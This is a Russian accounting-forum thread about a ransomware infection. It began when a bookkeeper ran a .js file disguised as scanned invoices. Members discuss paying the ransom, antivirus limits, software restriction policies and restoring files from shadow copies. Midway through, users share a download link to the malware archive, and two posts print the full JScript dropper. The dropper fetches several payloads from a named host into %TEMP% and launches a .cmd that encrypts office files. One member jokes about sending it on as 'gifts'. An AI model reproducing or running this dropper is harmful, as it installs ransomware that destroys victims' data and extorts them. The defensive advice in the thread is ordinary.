сегодня бух открыла некий архив, присланный по почте, и запустила из него скрипт

Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js


который в итоге зашифровал все офисные файлы...

куда копать ?

сговорилиись что-ли

дежавю

копать в сторону премиальной части буха и админа. Буха чтобы в следующий раз не запускала что попало, админа - что позволил крпитовирусу сьесть важные данные. Можно конечно еще кого-нибудь наказать за то, что антивируса нормального нет, но кто ж памятник накажет..

(3) каспер на том компе стоит

сейчас запустил этот скрипт на вирт машине -- зашифровал файлы

virusinfo.info говорит : Без оригинального дешифратора не обойтись

какой программой может промониторить, что происходит в системе ?

или как это скрипт запихнуть в отладчик, что пройти по шагово его ?

(8) Скорее всего шифрует ассимитричным алгоритмом, открытым ключом. поэтому зашифрованное без секретного ключа не расшифровать, даже изучив алгоритм по шагам

на диске должен лежать текстовый файл в котором координаты товарищей, которые за деньгу помогут расшифровать
берут кстати немного. Две недели назад на вот таком инциденте в таком файле нашел феерическое "напишите сколько сможете выслать". Кризис, видимо.

кстати, без инет скрипт не работает

(10) видел про оплату через крипто-валюту

(0) надо было отрубать комп из розетки и потом чем нибудь типа  RStudio восстанавливать

но не прокатить если оно умное и не удаляет, а поверх перезаписывает файлы ))

http://forum.drweb.com/index.php?showtopic=318074

400 EUR за расшифровку

У нас один магазин поймал такое. Вздохну, удалил к чертям зашифрованное вместе с вирусом да и все :)

(4) virustotal.com как на вирус реагирует?

Здравствуйте, уважаемые форумчане.
Пишу Вам по той же причине.

Друг по несчастью оплатил и получил ключ, а я вот сомневаюсь - платить или нет... Говорит, что ключ выслали в течение 30 минут и все расшифровал.
Правда, ему цену назвали более-менее приемлемую (около 200 долларов).
Посоветуйте, платить или нет... На антивирусных форумах все равно помощи никакой(((

(18) Дата регистрации: 12 августа 2014; сегодня.
Нюню.

(19) молодца так их террористов...

и им попавшимся тоже чтобы боялись ))

ЗЫ
тока ip то записать успели?

(0) От кого пришло? От знакомых контрагентов пришло письмо? Почему открыла?
Как там у Булгакова? "Никогда не говори с незнакомцами..."

(4) ну сколько раз можно повторять - ни один "каспер" никогда не даст защиты, т.к. все антивирусы основаны на неактуальных черных списках. Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.

(22) базы платных антивирей актуальны на 99.99999% это раз, во-вторых есть эвристика

(23) Да неужели? ))) сколько вирусов НЕ содержится в базе? Эвристика фигня.

Базы сигнатур более чем на ~10000000 не попадались, в то же время количество известных вирусов оценивается как превышающее 80 миллионов.

(25) Одна запись в антивирусной базе как правило описывает несколько реальных вирусов.

http://habrahabr.ru/post/159811/
авось поможет

(23) Как говорится, "жизненный опыт, это знание, как не стоит поступать в ситуации, которая больше никогда не повторится".
Автор шифровальщика успеет собрать профит в тот краткий миг между заказом спам-рассылки и реакцией антивирусных компаний. А уж реакцию эвристики самых распространённых антивирусов автор шафровальщика проверил до того, как оплачивать спамерам рассылку.

(21) да, от контрагента, с которым раньше работали

кстати, там вида ХР стоит

(0) Копать в поддержку каспера, если он стоит. Зря что ли деньги плачены за лицензию?

(30) прекрасно! неумный пользователь за дырявой осью

заплатите. люди же старались

+ (33) предварительно сообщив в управление-Р... может они ему фаберже открутят

(19) а вдруг он поиском нарвался на тему и зарегился на форуме, что бы узнать что к чему? А ты ему бан :(.

кстати в полицию заяву на вымогательство обязательно напишите. лох лохом, но все же пусть полиция ловит преступников.

(34) или заблокируют ящик , ну что бы никто ему денег не слал , ну и как результат не получит ключ

(37) думаю дним блокированием не ограничатся

(0) обычно платят, на будущее сделать выводы...

а так вообще у них фантазия норм работает одним моим знакомым пришло с вложением мол судебное распоряжение от приставов, от налоговой летит, причем почту придумывают подходящую...или знаю еще более веселый случай когда дважды шифрователь запустили - из разных писем, так один зашифровал а другой перешифровал(или они даже где-то пересеклись), в результате даже хакеры после оплаты ничего не смогли восстановить)))

(34) а вы оптимист! хотя заявление да можно написать

Вчера клиент тоже такую фигню подцепил. Пыталась открыть какую-то левую счет-факту. И самое интересное что зашифровались только базы 1С и бекапы.

(39) Деньги вернули?)

(41) После жалобы в Роспотребнадзор )))

(8) У меня админ в таких случаях оставляет жить вирус на компе и ловит хэш :)

Сейчас развелось развелось семейство криптовирусов, которые проходят касперского на ура...


Админу однозначно в лоб.
1. Вся важная инфа должна быть расположена на сервере
2. Данные должны бэкапиться ....

(41) ага, в двойном размере)))
...ответом было что-то типа - мы не знали что так можно (сдается мне грядёт шифровальшик 2.0 с новой фитчей - будет требоваться 2 ключа!!!))))

(26) Как правило нет.

(32) какая разница ?
этот скрипт та же влезает и в вин7

(33) это самое простое

(37) по скольку вирь стал сам рассылать по адресной книге самого себя, то могу предположить, что в "центр" уже сообщён адрес почты жертвы

это на тот случай, когда ящик заблокировать

чтобы заблокированному написать с другого =)

(43) там один гб+бух+ген

(0) пришли мне этот скрипт на [email protected]
тоже буду рассылать подарки

(50) ушло

(19) и ТС за одно :)

скрипт не сложный

(51) яндекс не пропустил

(50) http://myfolder.ru/files/41442240

(54) какой-то битый архив

(55) он не открывается ?

у меня открывается

Вчера и у меня пытался прорваться вирус аналогичный - вложение типа договор-черновик. нод вроде отловил.
админ в отпуске. посмотрим что будет...

(56) ага

(58) надо было отключить и посмотреть, что внутри

можешь js унутри архива переименовать в txt и еще раз перевыложить ?

содержание

Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js




//////////////////// autreplcant je us //////////////////
//////////////////// spm ml to extrcd ////////////////////

////// established ///////

function reps(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}function CreateObject(c){return new ActiveXObject(c)}
var nosensetoabuse="earthlingsfilm.com",tfool="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell"),earthlingsf="%TEMP%\\keybtc.cmd",rotadm="images",WshShell=CreateObject("WScript.Shell"),tfool=WshShell.ExpandEnvironmentStrings(tfool),docs="%TEMP%\\doc.doc";try{reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc"),WshShell.Run(""+docs+"",1,0)}catch(word){}reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd");WshShell.Run(""+earthlingsf+"",0,0);

/////// goodbye hooray ///////

у меня нормально открылся:

//////////////////// autreplcant je us //////////////////
//////////////////// spm ml to extrcd ////////////////////

////// established ///////

function reps(c,d)
{
var b=new ActiveXObject("MSXML2.XMLHTTP");
b.onreadystatechange=function()
  {
   if(4===b.readyState)
     {
      var a=new ActiveXObject("ADODB.Stream");
      a.open();
      a.type=1;
      a.write(b.ResponseBody);
      a.position=0;
      a.saveToFile(d,2);
      a.close()
     }
  };
b.open("GET",c,!1);
b.send()
}

function CreateObject(c)
{
  return new ActiveXObject(c)
}

var nosensetoabuse="earthlingsfilm.com",
                    tfool="%TEMP%\\",
                    WshShell=WScript.CreateObject("WScript.Shell"),
                    earthlingsf="%TEMP%\\keybtc.cmd",
                    rotadm="images",
                    WshShell=CreateObject("WScript.Shell"),
                    tfool=WshShell.ExpandEnvironmentStrings(tfool),
                    docs="%TEMP%\\doc.doc";
try
{
  reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc";),
  WshShell.Run(""+docs+"",1,0)
}
catch(word){}
reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd";);
WshShell.Run(""+earthlingsf+"",0,0);

/////// goodbye hooray ///////

(63) он качает с сайта тело и запускает его

1. Админ нафига дал права на админскую учетку у буха
2. Это не вирус, а тупо шифратор...
3. Админу ноги вырвать и ж...

(65) нету одминов

(64) Оо у вас разрешены скачка исполняемых файлов пользователям?? )))

(67) ты его запусти у себя

(62) ага, спасиб
просто антивирусняк выкашивает содержимое
:))

(69) яндекс тупо удалил из отправленных и не отправил =)

(68) че-то не запускается, ибо (22)

скажите своим админам чтоб теневое копирование сделали... Хоть что то, но восстановится! А так платить придется.

(71) так не все же это делают

(72) одинов нет

(74) Экономят?

Или маленькая фирма?

(75) (76) мини фирма

кстати, скрипт отрабатывает даже под обычным пользователем

вчера только попались, зашифровалась даже база 1с +флешки+ архивы 1с)
хотя раб стол не тронул. там и был последний архив 1с.
при отправке файлов по инструкции к оплате выставили счет 3.8 тысруб

(77) Мы тоже так разок влетели) у нас на фирме 1400 чел, активных в 1С около 50, спасло архивирование, и то что архив в инет (сервер) не лез. И не в домене.

вообще, в целях той-же сохранности DBF базы, к примеру (не только от шифраторов, но и от инсайдеров-сливальщиков) , есть большой смысл запретить в правах пользователей листинг директорий, т.е. невозможно будет получить стандартными методами список файлов в каталоге базы. При этом 1С-ка будет нормально работать, т.к. все имена файлов для нее известны заранее.

(22) > Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.


как средствами винды такое включить ?

(81) это если домен есть

(83) нет, у меня домена нет, такое используется для защиты баз 1С. Права настроены в свойствах папок на вкладке безопасность.
(82) Локальная политика безопасности / Политики ограниченного использования программ / создать/. По умолчанию / не разрешено. ну и дальше рулить как надо.

Там все юзеры админы что ли?

(81) нельзя ли поподробнее - как это сделать, точнее - какой пункт запретить в NTFS?

+(84)
здесь подробно:  http://www.windowsfaq.ru/content/view/694/46/

(86) я щас не на работе, скриншот не могу сделать, вроде "содержимое папки" но не только это.

(85) не админские права всё ранво запускают скрипт

(87) сейчас проверю

(88) я подожду, тема очень интересная, пожалуйста отпиши здесь, как появишься на работе.

(89) Антивирус какой?

(91) на той машины -- был каспер

(91) ни один антивирус ("проходи, если не в розыске") не поможет, если политика доступа приложений на компьютер будет оставаться "добро пожаловать, гости дорогие!" , а не "Стоять! Кто идет?"

(92) Понадеялась деваха на парня, стала мамой.

В общем, есть мнение, что нужно просто переименовать WSCRIPT.EXE и MSHTA.EXE, если вы их не используете.
(А если используете, то поменять расширения).
Тогда "всякая дрянь" не будет запускаться.
P.S. на *.scr я уже поставил запуск программы с сообщением "Вы запустили вирус" - теперь такое же нужно делать и с *.vbs и *.js (ну и *.wsf не забыть).

(95) какая тяга к изобретению велосипедов с квадратными колесами )

(81) Можно 1С запускать через RunAs от другой учётки с сохранением пароля (есть такая возможность), тогда к базе 1С будет доступ только у самой 1С.
А ещё лучше браузер запускать из под пользователя guest с очень урезанными правами - проблема только в том, что потом пользователи не могут открыть документы напрямую - но это решается использованием папки запуска где уже js-файл от doc-файла прекрасно отличат.

Не забываем, что js-файл - это сценарий, и его текст можно достаточно произвольно менять, перенося нужные вызовы из одной функции в другую - так что даже антивирус с эвристикой не поймёт что и к чему.

(93) У нас стоит доктор веб, он в настройках запрещает автозапуск программ. Про хост уже молу даже..

Вот опять кого-то зашифровали. ))
Кто же пользователям под админом то даёт работать. Только ограниченную учетку и ни каких вирусов/скриптов. ))

(87) да, уровень безопасности Не разрешено -- запрещает выполнение


а как тогда обмениваться политиками между разными конторами ?

+ (101)

про политики вопрос :

для политики "Локальный компьютер" установил

уровень безопасности -- Не разрешено
применять политику для всех, кроме одминов


почему тогда скрипт по-прежнему не запускается под одмином ?

(100) Даже если учётка ограничена, то всё равно все пользовательские файлы ей доступны, а то, что вирус в системной директории не побывал - это пользователя не спасает.
Просто, когда потом заходишь под админом, то даже поиск вируса занимает очень много времени (найти exe-файл в куче папок пользователя даже CureIt не сразу может).

(29) Я не открываю письма, если знаю что не жду от них ничего. Недавно похожее было. Типа пришло коммерческое предложение, я не открыла, т.к. нам от них ничего не нужно было. Самое смешное произошло через два дня. В этом письме появилось новое письмо с новой датой и заголовком типа "я вот недавно подумал.." - рассчитано на слишком любопытных.... Тогда я уже просто перезвонила контрагенту и спросила, они ответили что не отсылали. Письмо пошло в спам без открытия...

(104) значит можешь попасться, когда придёт вирус от нужного контрагента

(105) В смысле? Я знаю точно чей файл, значит отвечать будет контрагент, если у меня полет базы.

расширения файлов, которые шифрует вирус:
(*.xls *.xlsx *.doc *.docx *.xlsm *.jpg *.cdr *.pdf *.cd *.slddrw *.dwg *.accdb *.ai *.svg *.mdb *.1cd *.zip *.rar *.max)

(106) Подлинность электронного письма сейчас проверить достаточно сложно, особенно, если используется общедоступный mail-сервер.

(107) судя по расширениям 1С 7.7 устояла бы ;-)

(107) А почему в списке нет txt-файлов ?

(107) Ты думешь касперу будет интересен твой список?

(108) Есть же люди, которые занимаются киберпреступностью. Туда заяву и вперед пусть выясняют...

(112) Так вам нужно чтобы кого-то наказали или чтобы ваши файлы остались целы ?

(107) Ну 1с точно можно спасти, просто нужно копировать файлы на переносной диск пере выходом в инет с компа, где находится база....

(112) Пенты очень любят адресные заявы. Заява от конкретика на конкретика. А тут возьни дофига, вероятность потуг большая, а выхлопа не будет. Да и нет ущерба на миллиарды рубликов.

Кстати, элемент списка контроля доступа "запрет" имеют приоритет над "разрешено", так что любимые фотографии можно просто запретить за запись и удаление всем, кроме особенной учётки.

(110) не знаю

(113) Мне нужно чтобы остались целы. Ну а наказание мошенникам, пока никто не отменял, в случае форс-мажора...

https://www.virustotal.com/ru/file/88f15931b880db040d6e59c0930a53550c937c7bc88e0cb165c7669b0a211772/analysis/1407928475/
-Реакция на текст (63)

(114) только 8ку нужно переименовать )))

(114) У меня в одной конторе бухгалтера в инет ходят с одной машины, а вся бухгалтерия - на другой.

(118) ребята на самом деле молодцы

(120)  Зачем? Тупо копируешь на диск на всякий случай...

(121) в БД копированием ничего не вносят ?

(123) скрипт-шифровальщик идёт по ВСЕ подключённым дискам/флешкам/сетевым ресурсам

(121)  Я тоже так делаю....

(124) На компе с БД запустить можно только ограниченный список задач - даже время поменять - говорит "нельзя запускать RunDll32.exe"

(119) кстати, антивирь от мс -- сработал

(127) запустить счет на оплату и словить скрипт

(128) По идее, антивирус должен срабатывать не на сам скрипт, а на то, что он загружает.
С другой стороны, получение в сценарии какого-то файла и его запуск на исполнение уже должны рассматриваться как вирус.
P.S. с Windows XP для этого был даже поток файла с указанием зоны получения введён, чтобы давать различные разрешения на различные файлы, только почему-то оно так и не заработало, как должно.

И, самое главное, что должен быть правильно настроен firewall, чтобы ни одна программа, кроме браузера, не имела подключение к интернету, а особенно сценарии.

(128) Ага. Причем узнал в лицо.

(121) Это мало защит от загаженных флешек, особенно - после разных там ПФР и налоговых.

(129) Не пойму. А что его запускать? Открывай только для чтения. Винда сама это делает неплохо.

(129) Ну и как они его запустят ?
Запустить можно только exe-файл из списка или lnk-файл с подписью.
Ну а если кто-то нажимает на js-файл, он видит его на экране в блокноте - ну и пусть печатают, видят же, что не счёт.

(132) носи в фонды/инспекции sd-карты

(133) это как ?

(134) а винда по умолчанию вызывает программу по выполнению скрипта *?

(132) Ну на flash-диске прекрасно создаётся папка AUTORUN.INF с файлом внутри, который удалить нельзя (имя файла с ошибкой) и всё.

(137) regedit.exe вам в помощь - винда прекрасно запоминает, что нужно делать с тем или иным файлом.

(138) почему никак не удалишь ?

(139) сейчас посмотрю

(138) Ну-ну... Она создается тогда, когда попала в руки админу. В бюстгалтерии - ничего кроме проводок Дт-Кт не создается.

К слову о сигнатурах, (62) с обрезанными комментариями:
https://www.virustotal.com/ru/file/703ccfb749c9b0842addd9376aa92c2afd10f220dec60c220b5ca4d34317f34c/analysis/1407929616/

(142) т.е. если убрать комменты, то каспер видит ?

(143) Не знаю, но там ещё и формат другой.

Не, на одни комменты не реагируют.

(97) Под одинаковым пользователем 1С запускать нежелательно, а на каждого пользователя дублировать еще одну учетку неприемлемо. Опять-же на каждом рабочем месте ходить запоминать пароли тоже. Проще и надежнее один раз настроить права доступа к файлам, разрешив только те файловые операции (а не просто чтение/запись), которые необходимы и достаточны.
(99) а причем тут автозапуск? Пользователь сам запустит ничего не подозревая.
(102) после внесенных изменений перезагрузи параметры безопасности.
(106) контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП.
(143) нет, если ничего не убирая и не меняя просто отформатировать исходный (62) текст для удобочитатемости, как в (63), то каспер перестает видеть, вот она, хваленая "эвристика" каспера.

(146)

> после внесенных изменений перезагрузи параметры безопасности.

не отработало


> контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП.

контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно

(146)+(147) +  контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. >>
Если подписывает ЭЦП, тогда должна стоять программа Крипто-Про и обычно в этом случае файлы идут через оператора, а он отвечает за безопасность.
ИМХО: вероятность, что такой файл будет нести вирус очень даже низкая, если не нулевая.

контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно>>>
Если нет определенного уровня защиты и доступ к исполняемым файлам у всех, кто подошел к компу, тогда это преступная халатность или провокация преступления... Как-то так :)

(148)

пусть даже другой пример

я подписал архив, в котором каким-то образовал оказался скрипт, который всё шифрует

если получатель его запустит -- всё равно не буду ни за что отвечать, т.к. не было умысла

(148) а причем тут крипто-про? Для подписания он не обязателен, как и оператор. Много лет назад, когда только начинали работать с ЭЦП, из налоговой нам как-то раз приходил вордовский документ, зараженный вирусом и подписанный ЭЦП.

(149) >>"т.к. не было умысла"
тогда ч.2 ст 273 ))
"2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок до семи лет."

(151) где такие строки ?

http://www.zakonrf.info/uk/273/

(150) Теперь всё подписывают КЭП, а она требует установки Крипто. Там по лицензированию оператора это связано... если коротко..

(153) криптоПРО - это один из крипто-программ
есть и бесплатные аналоги

Был у меня один клиент, зашифровались файлы базы 1с7.7 dbf заплатили  хакерам. Ждали чуть больше недели правда. Я столько же денег заработал или даже больше за помощь.

(154) предлагаю с буха взять денег и за его счет решить проблему, ну и себе процент.

(156) денег брать надо с дира, а не буха

zak555, ты решил свой вопрос и как? Интересно, же...

(158) пока нет

но я почитал на форуме др.веба, что шифровальщик подразделяется на несколько классов -- часть можно уже расшифровать, а часть нет

сейчас компа у меня нет

(152) вот:
http://www.ukru.ru/code/09/273/
(153) КЭП ? впервые слышу.

(160) Уже год, как отчетность должна подписываться только КЭП (квалифицированная электронная подпись) приравнена в ГК РФ к собственноручной подписи.

(161) аа, а я подумал, что КЭП - программа какая-то ))
ну пару реквизитов в сертификат добавили, а суть-то таже.

(161) что значит должна ?

(160) читаем
Федеральный закон Российской Федерации от 7 декабря 2011 г. N 420-ФЗ -- пункт 188) статьи 1


http://www.rg.ru/2011/12/08/p-raboty-site-dok.html

(163) Отчеты как сдаешь? Вот подписываем теперь всё КЭП (усиленная квалифицированная электронная подпись) сертификация такая. С другой подписью отчет по ТКС не примут. Пойдешь ножками или по почте...

(165) ножками сдаю

(166)Фи, не стыдно? Чай, не в деревне находишься... Да и НДС теперь по ТКС сдают, как-бы...
Вот первая ссылка, там внутри текста есть ссылки на новый закон по КЭП и декларацию по НДС
http://www.buhonline.ru/pub/tks/2014/4/8529

(167)

а что стыдиться ?
адрес места нахождения юрлица находится недалеко от налоговой, после сдачи отчётов иди за почтой

отказать в приёме ндс на бумаге никто не вправе

(168) Ну это не совсем так, если выставляете и платите НДС.
------------------
http://www.buhonline.ru/pub/tks/2014/3/8401
ФНС напомнила, что декларации по НДС за первый квартал 2014 года необходимо отправить в электронном виде не позднее 20 апреля
Обязанность по представлению деклараций по НДС исключительно в электронном виде и только через оператора электронного документооборота закреплена за налогоплательщиками пунктом 3 статьи 80 и пунктом 5 статьи 174 Налогового кодекса. Соответствующие изменения в данные нормы были внесены Федеральным законом от 28.06.13 № 134-ФЗ*

(169) а как быть тем, у кого в округе нет интернета? совсем нет, даже сотовый на улице не ловит.

(170)  В стать 174 п.5 нет ничего про отсутствие связи. Есть обязанность в электронном виде.
Значит, если живет в лесу,  будет платить ЕСХН, т.е. без НДС....

(171) как организация, занимающаяся куплей-продажей в розницу может платить сельхозналог? ))

(172) Так в лесу же...:)

(173) ну и что, они (2 филиала у нас таких есть) не только в лесу, но и еще дорога к ним не круглый год бывает, а только когда паром ходит и лед замерзнет, причем в одном филиале платежки в банк (чужого региона) на бумаге возят, а другие вообще всегда только за наличку за товаром ездят.

(174) Значит поедет бух в квартал один раз и сдаст по ТКС через посредника...:)
Ну не пишут они про ваш случай...:)

(175) а для декларирования по алкоголю, например, представительства, как для ФНС, ПФР, не предусмотрено ))

(176) Значит покупаете нотик буху и вывозите его на полянку, где берет мобильный модем и ббух усиленно сдает всё и сам сдается..:)

(19) Зачем разработчика шифратора забанили? Я хотел с ним посоветоваться.

у нас гл.бух запустила такую штуку в письме "резюме". она зашифровала все документы MS Office и *.jpg на всех своих и общих сетевых дисках. платить все равно не будем))) за такое надо уголовную ответственность, как за кражу автомобильных номеров)))

(179) никак за такое не накажешь. По сути, те люди, которым переводятся деньги, помогают вам расшифровать файлы, а это не преступление.
Наказать можно тех людей, которые их зашифровали (это ваша гл. бух)

Скачал тело
оно даже zip rar 1cd фотки, офисный, корел, кад шифрует. Прикольно

(180) ну-ну)))

(180) вопрос, который автору вируса ты собирался задать, видимо, о сотрудничестве в области расшифровки был

Ну это не вирус, вирус себя вопроизводит, это другой тип вредоносных программ....

(184) ну да, правильно сказать - троянец

(169) > Ну это не совсем так, если выставляете и платите НДС.


максимальная ответственность за сдачу декларации НДС в бумажном виде -- 200 р
т.е. 800 р/год

сколько стоит ЭП и лицензия на сдачу через оператора ткс в год ?

(167) (169) и хватит приводить ссылки на г@вняный форум

(184) он и рассылает по адресной книге себя твоим контактам

Нас как то зашифровали, мы оплатили 1500 р и то что мы получили нам ни хрена не помогло, хотя в каком то смысле помощь оказало, но всю расшифровку на себя взяли специалисты Др.Веба, за 2 недели нам прислали готовый скрипт для расшифровки.

(100)Как все просто.
Выход конечно хороший, только вот далеко не всегда это возможно.

(188)У меня есть программка которая рассылает сообщение по всем или по выборочным контактам - аутлук называется.
И что теперь это вирус?

(191) ага

(191) Ключевое слово было "себя", т.е. вирус таким образом размножается. Аутулук, насколько я знаю, себя не рассылает (тем более в автоматическом режиме)

(189) + 100 нам также помогли.

кажись есть решение, сейчас проверю

+ есть идея, как вернуть деньги, если заплатишь

(191) требуется также здравый смысл при классификации чего-либо

(81) уважаемые специалисты, как правильно сделать запрет просмотра файлов в папке с базой DBF?

РЕЗЮМЕ :

чудным образом выяснилось, что у диска С оказались предыдущие версии, а вот у Д -- нет

а теперь вопрос

как автоматизировать процесс удаления зашифрованного файла вида
ИмяФайла.Расширение.keybtc@gmail_com
и перенос из папки восстановления нормального файла
ИмяФайла.Расширение

?

(199) Ты про архивные образы диска С речь ведешь?!

(201) ага
точки восстановления

(202) Ты погодь радоваться. А они пользовательские данные содержат?!

(203)

да, наживаю диск С правой кнопкой, далее предыддущие версии, нажимаю на кнопку открыть

и воля -- все данные на метсе

*мест

**на месте

http://habrahabr.ru/post/232545/
Попробуй мб поможет

кто бы по 200 подсказал

Абрахамс...

(187) Тебя там забанили? Ты там также писал и они тебя забанили, а теперь ты всё время пишешь что форум плохой...
Ищи сам про КЭП.

(210) нет, я там не бываю, но частенько ернуду там пишут

(211) Ты не прав.  Статьи на этом сайте хорошего качества.
Ещё сайт аудит уважаю.

(212) я неоднократно встречал там ошибки

клерк в этом плане лучший, ибо там каждую тему модерируют и говорят, где неправильно

(213) Какие темы, очнись. Я пишу про статьи. А что на форуме может ответить малознающий бух и его не успели поправить, так такие косяки могут быть у всех.
Читай что считаешь нужным, но, обязательно найдется человек, который тебе также заявит, что там пишут...:)
Ты вопрос свой решил?

(214)

1. хорошо, сравни с аналогичной статьёй на клерке : http://www.klerk.ru/buh/articles/345087/

2. по теме ветки ?

(215) 2. Да.

(216) с диска С восстановил данные, с диска Д -- нет

+ я так же проработал вариант, как вернуть деньги, которую платятся мошенникам

(215) Однако рассчитывать, что на деле все обойдется 200-рублевым штрафом, вряд ли стоит.>>>
Она не лучше статьи с  бухонлайна. Ты не прошел по ссылке на бухонлайн и теперь так пишешь.. На бухонлайне написано ещё больше и понятнее, нужно пройтись по ссылкам в статье.
А теперь вопрос? Первый квартал штрафанули на 200 р. второй на 200 р. или там уже типа злостного нарушения можно притянуть в течение периода (год)? И зачем себе создавать проблемы...(

(217) Молодец. А диск Д тоже пострадал?

(218)

1. где на бух онЛайн написано про штраф в 200 р за квартал ?
2. 800 р/год -- ни о чём
3. + не вижу никаких проблем

(219) разумеется, скрипт идёт по всем диска, в т.ч. и сетевым

(221) что решил делать?

(220)
1. пройди по ссылкам внутри статьи, там должно быть
2. И так из года в год? В НК есть - сдавать по ТКС, завтра могут поднять штрафы...
3. а на  за чем платить штраф, если можно сдать и спать спокойно..:)

(223)

1. не вижу
2. за день не поднимают
3. сколько годовое обслуживание по сдаче ткс ?

(266) 3. сколько стоит ООО на ОСНО ?

(227) Да, там разница будет небольшая, может также, надо на их сайте смотреть прайс. А ещё, если стоит БП Проф и есть ИТС, тогда можно из программы сдавать, только кэп получить нужно, кэп стоит примерно 500-1500 р., зависит от носителя.

(228) только ИТС стоит 26 000
+ ещё ЭП

(229) шифровка отрабатывается единожды

(230) Можно взять техно. По-моему, без разницы какой ИТС. Не вникала, надо посмотреть.

(232) как раз разница есть -- минимум ПРОФ
поэтому 0.8 р против 26 р -- ни о чём

(231) жуть что делать?, ты меня вчера напугал, что от контрагента пришло, можно и правда нечаянно открыть....

(233) А как обновляешь, нетиповая?

(234) воспользоваться советом из 22 и 84

(235) у клиентов

по 200 кто подскажет ?

(237) папка восстановления содержит необходимую структуру папок?

(238) ага

удалить можно попробовать так

del /S *.keybtc@gmail_com

и просто скопировать сверху то что есть.

(240) а переименовать ?

(242) кого?
в (200) вроде нет ничего про переименование

(243) если в папке с восстановлением есть некий файл, а в текущем состояние его нет (или файл переименован -- добавлен суффикс .keybtc@gmail_com), то при восстановлении точки этот файл не восстановится

(244) ааааа.
тады попробовать

ren *.keybtc@gmail_com *.

(245) только методика из 244 на виртуальной машине не отработала

=> пока остаётся убийство *.keybtc@gmail_com и копирование из копии в изначальное место

если сработает, то есть нюанс - ren не умеет рекурсию, т.е.
запускать надо в каждом каталоге или гуглить "cmd рекурсивное переименование"

(246) если откинуть .keybtc@gmail_com, восстанавливает?

(248) неа, не восстановил

хотя должен был

чёт вводные часто меняются.
предлагаю развернуть архив и руками (пользователя) скопировать нужное.

(241) ты представляешь, если это несколько сот тысяч документов *?

http://pikabu.ru/story/zashivrovali_faylyi_moshennichestvo_2585856

(252) развернуть архив и показать пользователю где теперь его документы.
ну или определиться при каких условиях происходит автоматическое восстановление.

(254) мне кажется, что нужно написать некий скрипт, который будет

0. указать в некую переменную путь к копиям : У = "\\localhost\C$\@GMT-2014.08.19-04.52.01"
1. искать по диску файлы с расширением *.keybtc@gmail_com
2. определять их путь Х
3. далее скопировать из у+х в х найденный соответствующий файл и удалить с расширением

я писать не буду :)

обработку напиши, найтифайлы умеет искать в подкаталогах.

(256) на 1с ?
её  ещё и ставить надо

(257) контекст форума как бы подразумевает :)
тады батниками

Вчера манагер получил письмо от известного (с кем работал раньше) контрагента. Почта, правда, была другая, но он внимания не обратил, что нормально. И в письме, как вы уже догадались, был шифровщик, зашифровавший ему весь комп.
Благо, на сервера не полез...

(259)

1. нет предыдущих версий ?
2. диски сервера не подключены, как сетевые ?

как сделал я
1. посмотрел где лежат похеренные файлы
2. отрезал им чужое расширение
3. пкм _на_папке_ -> предыдущая версия

Откат к предыдущим версиям целыми папками заметно сокращет трудозатраты.

(+259)админ позвонил этому контру: подтвердили взлом своей почты и то, что такие "письма счастья" получили почти все их контрагенты :)
(260)
1 - нет
2 - нет

(261) откат не поможет

(261)

1. не повезло
2. не повезло

(262) Ладно, что только письма счастье.
А вот когда тебя заносят в список спамеров и ты компания не может более отправлять почту, вот это проблема посерьезней :)

(259) Что у вас там так все плохо?
А где настройка фильтра по содержимому, что бы кромя док и екселя, может еще и архив, ничего не принимал :)

(265) Для этого нужно иметь несколько ящиков с разными именами, чтобы даже полный отказ одного из них не приводит к последствиям.
(266) Я тут одним "товарищам" фильтр по содержимому настроил, так они это - попросили систему переставить, так как под предложенной им ничего не работает - и не докажешь, что сделано в целях их безопасности.

(187) Это не г@вняный форум. Настоящий г@вняный форум вот: http://govnoforum.ru Хахаха!!!

(0)подари мне этот файл.

(271) см. в 54

(271) лентяй :)
там файлик тянет несколько экзешников из интернету. так что толку от скрипта загрузки - 0.